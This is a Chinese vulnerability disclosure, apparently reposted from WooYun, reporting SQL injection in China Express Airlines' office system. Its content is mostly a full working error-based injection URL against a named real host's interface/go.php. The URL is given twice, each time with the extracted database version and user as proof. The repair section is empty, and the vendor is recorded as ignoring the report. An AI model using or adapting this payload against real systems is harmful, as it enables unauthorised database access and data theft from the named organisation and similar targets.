神刀安全网

漏洞标题: 航空安全之华夏航空某重要系统SQL注入

漏洞详情

披露状态:

2016-03-28: 细节已通知厂商并且等待厂商处理中
2016-03-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

航空安全之华夏航空某重要系统sql注入

详细说明:

http://oa.g5air.com/

漏洞标题:  航空安全之华夏航空某重要系统SQL注入

http://oa.g5air.com//interface/go.php?APP_UNIT=aa%2527%20and%201=(select%201%20from(select%20count(*),concat(version(),0x7c,user(),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%20and%20%25271%2527=%25271

code 区域
mysql version:[email protected]

漏洞证明:

http://oa.g5air.com//interface/go.php?APP_UNIT=aa%2527%20and%201=(select%201%20from(select%20count(*),concat(version(),0x7c,user(),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%20and%20%25271%2527=%25271

code 区域
mysql version:[email protected]

修复方案:

版权声明:转载请注明来源 路人甲@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 航空安全之华夏航空某重要系统SQL注入

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
分享按钮